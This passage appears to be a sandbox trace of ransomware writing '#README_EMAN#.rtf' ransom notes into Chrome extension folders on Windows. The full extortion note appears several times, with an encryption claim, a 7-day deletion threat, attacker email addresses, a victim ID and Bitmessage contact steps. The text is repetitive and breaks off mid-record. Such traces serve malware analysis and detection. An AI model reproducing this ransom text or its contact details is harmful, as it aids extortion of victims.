k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.174] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.174] CloseHandle (hObject=0x2ec) returned 1 [0291.175] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\#readme_eman#.rtf")) returned 0xffffffff [0291.175] GetLastError () returned 0x2 [0291.175] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 